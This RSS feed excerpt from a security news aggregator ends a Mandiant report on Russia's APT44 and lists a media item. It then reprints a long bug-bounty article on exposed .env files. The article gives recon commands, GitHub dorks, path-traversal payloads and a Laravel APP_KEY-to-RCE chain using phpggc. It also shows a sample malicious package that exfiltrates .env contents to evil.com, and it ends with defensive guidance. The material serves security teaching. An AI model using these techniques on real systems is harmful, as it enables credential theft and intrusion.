<p><strong>Sponsored by Russian military intelligence, APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations. </strong><span>While most state-backed threat groups tend to specialize in a specific mission such as collecting intelligence, sabotaging networks, or conducting information operations, APT44 stands apart in how it has honed each of these capabilities and sought to integrate them into a </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/gru-disruptive-playbook"><span>unified playbook</span></a><span> over time. Each of these respective components, and APT44’s efforts to blend them for combined effect, are foundational to Russia’s guiding “information confrontation” concept for cyber warfare.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/apt44-fig1.max-1000x1000.jpg" alt="APT44’s Spectrum of Operations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="q4izg">Figure 1: APT44’s spectrum of operations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><strong>APT44 has aggressively pursued a multi-pronged effort to help the Russian military gain a wartime advantage and is responsible for nearly all of the disruptive and destructive operations against Ukraine over the past decade. </strong><span>Throughout Russia’s war, APT44 has waged a </span><a href="https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/" rel="noopener" target="_blank"><span>high intensity campaign</span></a><span> of cyber sabotage inside of Ukraine. Through the use of disruptive cyber tools, such as wiper malware designed to disrupt systems, APT44 has sought to impact a wide range of critical infrastructure sectors. At times, these operations have been coordinated with conventional military activity, such as kinetic strikes or other forms of sabotage, in an attempt to achieve joint military objectives. </span></p>
<p><span>However, as the war has endured, APT44’s relative focus has transitioned away from disruption to intelligence collection. The group’s targets and methods have shifted significantly in the second year of the war, with increasing emphasis placed on espionage activity intended to provide battlefield advantage to Russia’s conventional forces. For example, one long-running APT44 campaign has assisted forward-deployed Russian ground forces to exfiltrate communications from captured mobile devices in order to collect and process relevant targeting data. APT44’s approach to supporting Russia’s military campaign has evolved considerably over the past two years.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/apt44-fig2.max-1000x1000.jpg" alt="APT44’s Wartime Disruptive Activity">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="q4izg">Figure 2: APT44’s wartime disruptive activity</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><strong>We assess with high confidence that APT44 is seen by the Kremlin as a flexible instrument of power capable of servicing Russia's wide ranging national interests and ambitions, including efforts to undermine democratic processes globally.  </strong></p>
<p><span>Despite being an arm of Russia’s military, the group’s sabotage activity is not limited to military objectives and also spans Russia’s wider national interests, such as driving the Kremlin’s political signaling efforts, responses to crises, or intended non-escalatory responses to perceived slights to Moscow’s stature in the world.  </span></p>
<p><span>APT44’s support of the Kremlin’s political objectives has resulted in some of the largest and most consequential cyber attacks in history. These operations include first-of-their-kind disruptions of Ukraine's energy grid in the winters of 2015 and 2016, the global NotPetya attack timed to coincide with Ukraine’s Constitution Day in 2017, and the disruption of the opening ceremony of the 2018 Pyeongchang Olympics in response to Russia's doping ban from the games, to name a few. </span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/apt44-fig3.max-1000x1000.png" alt="Timeline of Consequential Pre-War APT44 Operations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="q4izg">Figure 3: Timeline of consequential pre-war APT44 operations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><strong>Due to its history of aggressive use of network attack capabilities across political and military contexts, APT44 presents a persistent, high severity threat to governments and critical infrastructure operators globally where Russian national interests intersect. </strong><span>The combination of APT44's high capability, risk tolerance, and far-reaching mandate to support Russia’s foreign policy interests places governments, civil society, and critical infrastructure operators around the world at risk of falling into the group's sights on short notice. </span></p>
<p><span>We also judge APT44 to present a significant proliferation risk for new cyber attack concepts and methods. Continued advancements and in-the-wild use of the group’s disruptive and destructive capabilities has likely lowered the barrier of entry for other state and non-state actors to replicate and develop their own cyber attack programs. Russia itself is almost certainly alert to and concerned about this proliferation risk, as Mandiant has observed Russian cybersecurity entities </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/cosmicenergy-ot-malware-russian-response"><span>exercise</span></a><span> their ability to defend against categories of disruptive cyber capabilities originally used by APT44 against Ukraine.  </span></p>
<h2><span>Looking Ahead</span></h2>
<p><span>APT44 will almost certainly continue to present one of the widest and highest severity cyber threats globally. It has been at the forefront of the threat landscape for over a decade and is responsible for a long list of firsts that have set precedents for future cyber attack activity. Patterns of historical activity, such as efforts to influence elections or retaliate against international sporting bodies, suggest there is no limit to the nationalist impulses that may fuel the group’s operations in the future.</span></p>
<p><span>As Russia’s war continues, we anticipate Ukraine will remain the principal focus of APT44 operations. However, as history indicates, the group’s readiness to conduct cyber operations in furtherance of the Kremlin’s wider strategic objectives globally is ingrained in its mandate. We therefore assess that changing Western political dynamics, upcoming elections, and emerging issues in Russia’s near abroad will also continue to shape APT44’s operations for the foreseeable future.</span></p>
<h2><span>Protecting the Community</span></h2>
<p><span><span>As part of our research, we take various steps to protect customers and the community:</span></span></p>
<ul>
<li><span><span>Google's <a href="https://blog.google/threat-analysis-group/" rel="noopener" target="_blank">Threat Analysis Group (TAG)</a> uses the results of our research to improve the safety and security of Google’s products. </span></span>
<ul>
<li><span><span>Upon discovery, all identified websites and domains are added to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span>Safe Browsing</span></a><span> to protect users from further exploitation. </span></span></li>
<li><span><span>All targeted Gmail and Workspace users are sent </span><a href="https://support.google.com/a/answer/9007870" rel="noopener" target="_blank"><span>government-backed attacker alerts</span></a><span>,</span><span> notifying them of the activity, encouraging potential targets to enable </span><a href="https://support.google.com/accounts/answer/11577602" rel="noopener" target="_blank"><span>Enhanced Safe Browsing</span></a><span> for Chrome, and ensuring them that all devices are updated. </span></span></li>
</ul>
</li>
<li><span><span>Where possible, Mandiant sends victim notifications via the </span><a href="https://www.mandiant.com/resources/insights/mandiant-victim-notification-program" rel="noopener" target="_blank"><span>Victim Notification Program</span></a><span>. </span></span></li>
<li><span><span>If you are a Google Chronicle Enterprise+ customer, Chronicle rules were released to your </span><a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><span>Emerging Threats</span></a><span> rule pack, and IOCs are available for prioritization with </span><span>Applied Threat Intelligence</span><span>.</span><span> </span></span></li>
<li><span><span>A VirusTotal Collection featuring <a href="https://www.virustotal.com/gui/collection/0bd93a520cae1fd917441e6e54ff263c88069ac5a7f8b9e55ef99cd961b6a1c7" rel="noopener nofollow noreferrer" target="_blank">APT44-related indicators of compromise</a> is now available for registered users.</span></span></li>
</ul>
<p><span><span>We are committed to sharing our findings with the security community to raise awareness, and with companies and individuals that might have been targeted by these activities. </span></span></p>
<p><span><span>Read the <a href="https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf" rel="noopener" target="_blank">APT44 report</a> for our full analysis of this group, <span>a detailed list of malware used by APT44 since 2018, </span></span></span><span>hunting rules for detecting the malware, and a list of </span><a href="https://www.mandiant.com/advantage/security-validation" rel="noopener" target="_blank"><span>Mandiant Security Validation</span></a><span> actions organizations can use to validate their security controls.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gone in 60 minutes]]></title>
<description><![CDATA[It should have been the final straw. The new power couple of editorial failure - Bari Weiss and Nick Bilton - had fired legendary 60 Minutes journalist Scott Pelley. Why? Because he dared to question the fact that CBS had installed sycophants in its top ranks. Instead of standing in solidarity, c...]]></description>
<link>https://tsecurity.de/de/3576348/it-nachrichten/gone-in-60-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576348/it-nachrichten/gone-in-60-minutes/</guid>
<pubDate>Fri, 05 Jun 2026 20:47:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It should have been the final straw. The new power couple of editorial failure - Bari Weiss and Nick Bilton - had fired legendary 60 Minutes journalist Scott Pelley. Why? Because he dared to question the fact that CBS had installed sycophants in its top ranks. Instead of standing in solidarity, correspondents Lesley Stahl, Bill […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Frontend Security & Bug Hunting: The .env File Crisis and Real-World Exploitation]]></title>
<description><![CDATA[The .env file is simultaneously one of the most convenient and most dangerous patterns in modern web development. The data is clear: over 12 million exposed files, 28 million credentials leaked on GitHub in 2025 alone, and 110,000 domains compromised in a single extortion campaign.For bug bounty ...]]></description>
<link>https://tsecurity.de/de/3571868/hacking/frontend-security-bug-hunting-the-env-file-crisis-and-real-world-exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571868/hacking/frontend-security-bug-hunting-the-env-file-crisis-and-real-world-exploitation/</guid>
<pubDate>Thu, 04 Jun 2026 10:21:43 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The .env file is simultaneously one of the most convenient and most dangerous patterns in modern web development. The data is clear: over 12 million exposed files, 28 million credentials leaked on GitHub in 2025 alone, and 110,000 domains compromised in a single extortion campaign.</p><p>For bug bounty hunters, .env exposure remains one of the highest-impact, lowest-effort findings. The methodology is straightforward: subdomain enumeration, content discovery, GitHub dorking, and source map analysis. The payoff can be complete database access, cloud account takeover, or Remote Code Execution.</p><p>For developers and security teams, the solution requires a cultural shift: treat .env files as explosive devices, move secrets out of configuration files entirely, use short-lived credentials, block hidden files at the server level, and scan everything -- including AI-generated code -- before it reaches production.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TSS6p8MhJPdZtCHZZ0EC1g.png"><figcaption>Frontend Security &amp; Bug Hunting: The .env File Crisis and Real-World Exploitation</figcaption></figure><h3>Part I: The .env File Crisis — Why 12 Million Exposed Files Should Terrify You</h3><h4>The Anatomy of a .env File</h4><p>The .env file is the silent backbone of modern web application configuration. It stores environment variables in a simple KEY=VALUE format and is consumed by frameworks like Laravel, Django, Ruby on Rails, Symfony, and countless Node.js applications at startup. The problem is not the concept -- it is how these files are handled, deployed, and (mis)protected.</p><p>A typical .env file might contain:</p><pre>DB_HOST=production-db.internal.corp.com<br>DB_DATABASE=main_production<br>DB_USERNAME=root<br>DB_PASSWORD=Str0ng!Passw0rd<br>APP_KEY=base64:abcdef1234567890abcdef1234567890<br>AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE<br>AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY<br>STRIPE_SECRET=sk_live_4eC39HqLyjWDarjtT1zdp7dc<br>REDIS_HOST=127.0.0.1<br>REDIS_PASSWORD=secret<br>MAIL_USERNAME=admin@corp.com<br>MAIL_PASSWORD=smtp_password_here</pre><p>One file. One misconfiguration. Total compromise.</p><h3>The 2024 Unit 42 Campaign: Scale of the Problem</h3><p>In August 2024, Palo Alto Networks’ Unit 42 uncovered a massive cloud extortion campaign that directly exploited exposed .env files. The numbers are staggering:</p><ul><li>110,000 domains scanned for exposed .env files</li><li>90,000+ unique leaked environment variables harvested</li><li>7,000+ cloud service credentials (AWS, Azure, GCP, DigitalOcean)</li><li>1,500+ social media account credentials</li><li>1,185 unique AWS access keys</li><li>333 PayPal OAuth tokens</li><li>235 GitHub tokens</li><li>111 HubSpot API keys</li><li>39 Slack webhooks</li></ul><p>The attack chain was elegant and terrifying:</p><blockquote>Scan — Automated internet-wide scanning using malicious AWS Lambda functions, iterating over millions of domains with curl requests to http://&lt;target&gt;/.env</blockquote><blockquote>Harvest — Extract all environment variables from accessible .env files</blockquote><blockquote>Escalate — Use exposed IAM access keys to create new IAM roles with administrative permissions</blockquote><blockquote>Propagate — Deploy new Lambda functions to continue scanning from within the victim’s own cloud infrastructure</blockquote><blockquote>Exfiltrate — Steal data from S3 buckets and other cloud storage</blockquote><blockquote>Extort — Leave ransom notes threatening to sell the data on the dark web</blockquote><p><strong>Source:</strong> <a href="https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/">Unit 42 — Large-Scale Cloud Extortion Operation</a></p><h3>The 2026 Security Affairs Study: 12 Million Files</h3><p>Fast forward to February 2026: Security Affairs reported that researchers had identified over 12 million exposed .env files across the internet. The primary exposure vectors:</p><ol><li>Web server misconfiguration — No rule blocking hidden files (files starting with a dot). Simply visiting https://example.com/.env returns the entire file.</li><li>Reverse proxies forwarding sensitive paths — Nginx or Apache misconfigured to serve static files from the project root.</li><li>Container images embedding secrets — Dockerfiles using COPY . . which includes .env in the image layers.</li><li>Forgotten backup files — .env.bak, .env.old, .env.save, env.txt left in web-accessible directories.</li><li>Git repository exposure — The .env file committed to source control, then the repo made public or accessed via exposed .git directories.</li></ol><h3>Part II: Real-World Bug Hunting with .env Files</h3><h3>Case Study 1: Azure Subdomain .env Disclosure</h3><p>Source: Infosec Writeups / Bug Bounty Program</p><p>A bug bounty hunter was conducting reconnaissance on a target and discovered a subdomain that appeared to be running Laravel. Using ffuf for content discovery, they ran a wordlist against the subdomain:</p><pre>ffuf -u https://target-subdomain.azurewebsites.net/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt</pre><p>The scan returned a 200 OK for /.env -- but accessing it directly returned a 403 Forbidden. The hunter noticed something critical: the CNAME record pointed to *.azurewebsites.com, and while the main domain had restrictions, the underlying Azure-hosted subdomain did not.</p><p>By accessing the raw Azure endpoint URL, the .env file was fully readable, revealing:</p><pre>DB_CONNECTION=mysql<br>DB_HOST=internal-db.mysql.database.azure.com<br>DB_PORT=3306<br>DB_DATABASE=production_db<br>DB_USERNAME=admin<br>DB_PASSWORD=P@ssw0rd!<br>MAIL_HOST=smtp.sendgrid.net<br>MAIL_USERNAME=apikey<br>MAIL_PASSWORD=SG.xxxxxxxxxxxxxxxx</pre><p>Impact: Database credentials + SMTP API key for SendGrid. With these, the hunter could have dumped the entire production database and sent phishing emails as the legitimate domain.</p><h3>Case Study 2: Laravel APP_KEY to RCE Chain</h3><p>Source: Multiple researchers (Mogwai Labs, Ghostable, Stratosally)</p><p>This is one of the most dangerous exploitation chains in the Laravel ecosystem. The .env file contains APP_KEY, which is the cryptographic backbone of the entire Laravel application. It is used for encrypting cookies, session data, and serialized objects.</p><p>The vulnerability: Laravel’s Crypt::decrypt() function uses PHP's unserialize() under the hood. If an attacker has the APP_KEY, they can craft a malicious encrypted payload that, when decrypted, triggers PHP object injection leading to Remote Code Execution.</p><p>The exploitation chain:</p><ol><li>Discover the APP_KEY — Find it in an exposed .env file, or via GitHub dorking (filename:.env APP_KEY).</li><li>Use phpggc — The PHP Generic Gadget Chains tool (phpggc) generates gadget chains for Laravel.</li></ol><pre># Clone phpggc<br>git clone https://github.com/ambionics/phpggc<br>cd phpggc<br><br># Generate a Laravel RCE gadget chain<br>php phpggc Laravel/RCE1 system 'id' --base64</pre><p>3. Encrypt with the APP_KEY — The attacker encrypts the malicious payload using the stolen APP_KEY:</p><pre># Pseudocode for encrypting with the leaked APP_KEY<br>$payload = base64_decode('&lt;phpggc_output&gt;');<br>$key = base64_decode(substr('base64:abcdef1234567890abcdef1234567890', 7));<br>$iv = random_bytes(16);<br>$encrypted = openssl_encrypt($payload, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);<br>$final = base64_encode($iv . $encrypted);</pre><p>4. Deliver the payload — Send the encrypted value as a Laravel session cookie or any other decrypted input.</p><p>5. RCE — Laravel decrypts the payload, PHP unserializes it, and the attacker’s command executes.</p><p>Real-world impact: In 2025, researchers found hundreds of Laravel APP_KEY values leaked on GitHub. Tools like phpggc make weaponization trivial. The attacker does not need SQL injection or file upload -- just one exposed .env file.</p><h3>Case Study 3: GitHub Dorking for .env Files at Scale</h3><p>Source: Multiple bug bounty hunters</p><p>Advanced GitHub dorking is one of the most productive techniques for finding exposed .env files. The key operators:</p><pre># Find all .env files across all public repositories<br>filename:.env<br><br># Find .env files in a specific organization<br>org:targetcompany filename:.env<br><br># Find .env files containing specific sensitive keys<br>filename:.env "AWS_ACCESS_KEY_ID"<br>filename:.env "DB_PASSWORD"<br>filename:.env "STRIPE_SECRET"<br>filename:.env "APP_KEY"<br><br># Find .env files mentioning a specific domain<br>"target.com" filename:.env<br><br># Combined: target company .env with API keys<br>org:targetcompany filename:.env ("API_KEY" OR "SECRET" OR "PASSWORD")<br><br># Search for config files broadly<br>filename:.env "production" AND ("sk_live" OR "AKIA" OR "service_role")</pre><p>Pro tip from hunters: Combine with extension: and path: operators:</p><pre># Search specific paths<br>path:config filename:.env<br>path:laravel filename:.env<br><br># Search for backup variants<br>filename:.env.bak<br>filename:.env.old<br>filename:.env.local<br>filename:.env.production</pre><p>The Snyk 2025 State of Secrets Report revealed that 28 million credentials were leaked on GitHub in 2025 alone, with .env files being one of the top sources.</p><h3>Case Study 4: Exposed Source Maps Leading to Stripe Secret Keys</h3><p>Source: Sentry Security Blog / Prodefense.io</p><p>A bug bounty hunter discovered that a target website had accidentally deployed JavaScript source maps to production. Source maps (.map files) are used during development to map minified JavaScript back to original source code for debugging.</p><p>The attacker used Sourcemapper (a tool that reconstructs original source from .map files):</p><pre># Install sourcemapper<br>pip install sourcemapper<br><br># Download and reconstruct source from an exposed source map<br>sourcemapper -url https://target.com/assets/js/app.js.map -output ./reconstructed/</pre><p>Inside the reconstructed source code, the hunter found:</p><pre>// Original source code exposed<br>const stripe = require('stripe');<br>const stripeClient = new stripe('sk_live_4eC39HqLyjWDarjtT1zdp7dc');<br><br>// Internal API endpoints<br>const adminApi = 'https://internal-admin.target.com/api/v2/';<br>const deleteUserEndpoint = `${adminApi}users/delete/`;</pre><p>Impact: The Stripe live secret key (starting with sk_live_) allowed the attacker to make unauthorized charges, refunds, and access all customer payment data. The exposed admin API endpoints opened the door for further exploitation.</p><h3>Case Study 5: Exposed .git Directory — Full Source Code in Version Control History</h3><p><em>Source: PortSwigger Web Security Academy / NCSC Switzerland</em></p><p>A production server had its .git directory publicly accessible. The .git folder contains the complete version control history of the project, including every file that was ever committed -- even files that were later deleted or whose secrets were "removed" in subsequent commits.</p><pre># Recursively download the entire .git directory from the live server<br>wget -r https://target.com/.git/<br><br># Check the Git log for secrets that were "removed"<br>git log -p | grep -E 'password|secret|key|token|AKIA'</pre><p>The NCSC Switzerland audit found 1,300 affected systems in Switzerland alone where .git folders were publicly accessible, exposing source code, access data, and passwords.</p><p>Real bug bounty example: A hunter found that a target’s .git directory was browsable. Running git log --diff revealed a commit message: <em>"Remove admin password from config"</em>. The diff showed the previous version of the config file with the hardcoded admin password still in Git history:</p><pre>git show &lt;commit_hash&gt;<br># Output:<br># - ADMIN_PASSWORD=SuperSecretPass123!<br># + ADMIN_PASSWORD=${ADMIN_PASSWORD_ENV}</pre><p>The password was removed from the current file but remained forever in Git history. The hunter logged in as administrator and completely took over the application.</p><h3>Part III: Advanced Reconnaissance &amp; Hunting Methodology</h3><h3>Phase 1: Subdomain Enumeration</h3><p>Before you can find exposed files, you need to know where to look.</p><pre># Passive enumeration<br>subfinder -d target.com -o subdomains.txt<br>amass enum -passive -d target.com -o amass.txt<br>assetfinder --subs-only target.com &gt;&gt; subdomains.txt<br><br># Active enumeration<br>ffuf -u https://FUZZ.target.com -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt<br><br># Certificate Transparency<br>curl -s "https://crt.sh/?q=%25.target.com&amp;output=json" | jq -r '.[].name_value' | sort -u<br><br># Combine and deduplicate<br>cat subdomains.txt | sort -u | httpx -silent -o live_hosts.txt</pre><h3>Phase 2: Content Discovery for .env Files</h3><pre># Using ffuf for .env file discovery<br>ffuf -u https://target.com/FUZZ \<br>  -w wordlist.txt \<br>  -fc 403,404 \<br>  -t 100<br><br># .env-specific wordlist<br>echo ".env<br>.env.bak<br>.env.old<br>.env.save<br>.env.local<br>.env.production<br>.env.development<br>env.txt<br>env<br>.env.example" &gt; env_wordlist.txt<br><br># Recursive discovery with feroxbuster<br>feroxbuster -u https://target.com \<br>  -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt \<br>  -x env,txt,bak,old,swp,save,conf,config \<br>  --depth 3 \<br>  --silent</pre><h3>Phase 3: Advanced GitHub Dorking</h3><pre># Automated GitHub dorking with gitdorker<br>gitdorker -q target.com -tf ./tf/ -d ./Dorks/Alldorks.ndjson -o output<br><br># Manual targeted dorks<br>site:github.com target.com filename:.env<br>site:github.com target.com "DB_PASSWORD"<br>site:github.com target.com "sk_live_" "Stripe"<br>site:github.com target.com "AKIA" "AWS"<br>site:github.com "target" filename:".env" "APP_KEY"</pre><h3>Phase 4: Source Map Enumeration</h3><pre># Check for source maps on live targets<br>cat live_hosts.txt | while read url; do<br>  # Try common source map locations<br>  curl -s -o /dev/null -w "%{http_code}" "$url/assets/js/app.js.map"<br>  curl -s -o /dev/null -w "%{http_code}" "$url/static/js/main.js.map"<br>  curl -s -o /dev/null -w "%{http_code}" "$url/build/static/js/main.js.map"<br>done<br><br># Reconstruct and grep for secrets<br>sourcemapper -url https://target.com/js/app.js.map -output ./recon/<br>grep -rni "sk_live\|AKIA\|password\|secret\|token" ./recon/</pre><h3>Phase 5: Directory Traversal Testing</h3><p>Sometimes .env files are not at the root but accessible through path traversal:</p><pre># Path traversal payloads<br>ffuf -u https://target.com/page.php?file=FUZZ \<br>  -w traversal_wordlist.txt<br><br># Common traversal wordlist entries<br>../../../.env<br>..%252f..%252f..%252f.env<br>....//....//....//.env<br>..\;../..\;../.env<br>/static/../../../.env</pre><h3>Part IV: The Expanded Attack Surface Beyond .env</h3><h3>Source Maps</h3><p>Source maps (.map files) are JavaScript's hidden tell-all. They reconstruct minified code back to the original source, complete with comments, function names, and file structure.</p><p>What source maps can reveal:</p><ul><li>Original source code and business logic</li><li>Developer comments (TODOs, FIXMEs, known bugs)</li><li>Internal API endpoints and admin panels</li><li>Hardcoded credentials</li><li>Third-party integration details</li><li>Environment variable expectations</li></ul><pre># Check for common source map locations<br>curl -si https://target.com/static/js/main.abc123.js.map<br>curl -si https://target.com/assets/js/app.js.map<br>curl -si https://target.com/build/js/bundle.js.map<br><br># Parse source maps for secrets (Node.js)<br>npm install -g source-map-cli<br>curl -s https://target.com/js/app.js.map | source-map --raw | grep -E 'key|token|secret|password'</pre><h3>Exposed .git Directories</h3><p>The .git directory is perhaps the most dangerous exposure because it contains the entire history of the project.</p><p>Tools for .git exploitation:</p><pre># git-dumper - downloads entire .git repo<br>git-dumper https://target.com/.git/ ./downloaded_repo/<br><br># GitTools - extract from exposed .git<br>git clone https://github.com/internetwache/GitTools<br>cd GitTools/Dumper<br>./gitdumper.sh https://target.com/.git/ ./repo/<br>cd GitTools/Extractor<br>./extractor.sh ./repo/ ./extracted/<br><br># Search entire Git history for secrets<br>cd extracted<br>git log --all -p | grep -E '(password|secret|key|token|AKIA|sk_live)'<br>git log --all --diff-filter=D --summary | grep delete  # Find deleted files</pre><h3>Backup Files</h3><p>Developers frequently create backup files during maintenance:</p><pre># Common backup file extensions<br>.bak, .old, .orig, .copy, .tmp, .swp, .swo, .save, ~ (tilde)<br><br># Fuzzing for backup files<br>ffuf -u https://target.com/FUZZ \<br>  -w backup_wordlist.txt<br><br># Example wordlist entries<br>config.php.bak<br>.env.bak<br>database.php.old<br>wp-config.php~<br>index.php.swp<br>.env.save</pre><h3>Configuration Files</h3><p>Beyond .env, other config files often contain secrets:</p><pre># Common config files to hunt<br>config.json<br>config.php<br>config.js<br>settings.py<br>application.properties<br>application.yml<br>database.yml<br>credentials.json<br>service-account.json<br>wp-config.php</pre><h3>Part V: The Supply Chain Angle — Malicious Dependencies</h3><p>Malicious packages actively hunt for .env files during installation. Since npm install (and pip install, gem install, etc.) can execute arbitrary code, a compromised dependency can:</p><pre>// Malicious package.js (hypothetical but based on real incidents)<br>const fs = require('fs');<br>const https = require('https');<br><br>// Read .env file<br>const envContent = fs.readFileSync('.env', 'utf8');<br><br>// Exfiltrate to attacker server<br>https.get(`https://evil.com/exfil?data=${Buffer.from(envContent).toString('base64')}`);</pre><p>Real incidents:</p><ul><li>Shai-Hulud NPM worm — Designed to hunt and exfiltrate NPM and GitHub tokens at scale</li><li>@ctrl/tinycolor compromise (2.2M weekly downloads) — Attackers weaponized TruffleHog itself as a payload to find and exfiltrate secrets</li><li>node-ipc supply chain attack — Malicious versions published to target specific developers</li><li>Cursor AI editor incident (2024) — .env file contents were being sent to servers for tab completion, even when files were listed in .cursorignore</li></ul><h3>Part VI: Defense in Depth — How to Protect Against .env Exposure</h3><h3>Immediate Remediation</h3><ol><li>Block hidden files at the server level</li></ol><pre># Apache<br>&lt;FilesMatch "^\."&gt;<br>    Require all denied<br>&lt;/FilesMatch&gt;</pre><pre># Nginx<br>location ~ /\.(?!well-known) {<br>    deny all;<br>    return 404;<br>}</pre><pre>// IIS<br>&lt;system.webServer&gt;<br>    &lt;security&gt;<br>        &lt;requestFiltering&gt;<br>            &lt;hiddenSegments&gt;<br>                &lt;add segment=".env" /&gt;<br>            &lt;/hiddenSegments&gt;<br>        &lt;/requestFiltering&gt;<br>    &lt;/security&gt;<br>&lt;/system.webServer&gt;</pre><p>2. Remove .env from web-accessible directories -- Move it outside the document root.</p><p>3. Implement CSP headers to restrict where scripts can load from.</p><p>4. Disable source maps in production builds:</p><pre>// webpack.config.js<br>module.exports = {<br>  // ...<br>  devtool: process.env.NODE_ENV === 'production' ? false : 'source-map',<br>};<br><br>// vite.config.js<br>export default defineConfig({<br>  build: {<br>    sourcemap: process.env.NODE_ENV !== 'production',<br>  },<br>});<br><br>// next.config.js<br>module.exports = {<br>  productionBrowserSourceMaps: false,<br>};</pre><h3>Prevention</h3><ol><li>Use a secrets manager — HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, GCP Secret Manager</li><li>Implement .gitignore correctly and audit with git-secrets or trufflehog</li><li>Use pre-commit hooks to scan for secrets:</li></ol><pre># .pre-commit-config.yaml<br>repos:<br>  - repo: https://github.com/awslabs/git-secrets<br>    rev: master<br>    hooks:<br>      - id: git-secrets</pre><p>4. Rotate secrets regularly — If a .env file might have been exposed, rotate every credential in it immediately.</p><p>5. Scanner automation — Integrate secret scanning into CI/CD pipelines:</p><pre># TruffleHog scan in CI<br>trufflehog filesystem --directory=. --json | jq '.'</pre><p>6. Use ephemeral credentials — Short-lived tokens (IAM roles, OAuth2 token exchange) instead of long-lived API keys.</p><h3>Detection</h3><ol><li>Monitor for /.env requests in access logs</li><li>Use automated scanners like shhgit, trufflehog, git-secrets</li><li>Deploy canary tokens — Fake credentials placed in .env files that alert when used</li></ol><h3>Part VII: The 2026 Vibe Coding Problem</h3><p>The rise of AI-assisted development — “vibe coding” — has introduced a new dimension to the .env crisis. Research from 2026 shows that AI-generated code frequently makes mistakes that expose secrets:</p><ul><li>Hallucinated dependencies — AI tools generate package.json files with packages that do not exist in the registry, creating opportunities for typosquatting attacks</li><li>Hardcoded credentials — AI models trained on public code learn the pattern of hardcoding secrets and reproduce it</li><li>Source maps left enabled — Default build configurations generated by AI often leave source maps enabled for production</li><li>Missing server blocks — AI-generated deployment configs rarely include rules to block hidden files</li></ul><p>The fix: Treat AI-generated code as untrusted input. Audit every file for secrets before deployment. Use automated scanners in CI/CD.</p><h3>References</h3><ul><li><a href="https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/">Unit 42 — Large-Scale Cloud Extortion Operation via Exposed .env Files</a></li><li><a href="https://securityaffairs.com/188590/hacking/12-million-exposed-env-files-reveal-widespread-security-failures.html">Security Affairs — 12 Million Exposed .env Files</a></li><li><a href="https://snyk.io/articles/state-of-secrets/">Snyk 2025 State of Secrets — 28M Credentials Leaked on GitHub</a></li><li><a href="https://blog.sentry.security/abusing-exposed-sourcemaps/">Sentry Security Blog — Abusing Exposed Sourcemaps</a></li><li><a href="https://mogwailabs.de/en/blog/2022/08/exploiting-laravel-based-applications-with-leaked-app_keys-and-queues/">Mogwai Labs — Exploiting Laravel with Leaked APP_KEYs</a></li><li><a href="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage">OWASP — Review Web Page Content for Information Leakage</a></li><li><a href="https://github.com/techgaun/github-dorks">GitHub Dorking — techgaun/github-dorks</a></li><li><a href="https://www.invicti.com/web-application-vulnerabilities/dotenv-env-file">Invicti — Dotenv .env File Vulnerability</a></li><li><a href="https://vibe-eval.com/data-studies/frontend-secrets-leak-report-2026/">Vibe Eval 2026 — Frontend Secrets Leak Report</a></li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vJZv0GNgEFzmfX6QmvfmOQ.png"><figcaption>Follow Me</figcaption></figure><p><em>GitHub: </em><a href="https://github.com/SecurityTalent"><em>SecurityTalent</em></a><em> | Medium: </em><a href="https://medium.com/@securitytalent"><em>Security Talent</em></a><em> | Twitter: </em><a href="https://twitter.com/Securi3yTalent"><em>Securi3yTalent</em></a><em> </em>| Facebook: <a href="https://www.facebook.com/Securi3ytalent/">Securi3ytalent</a> | Telegram: <a 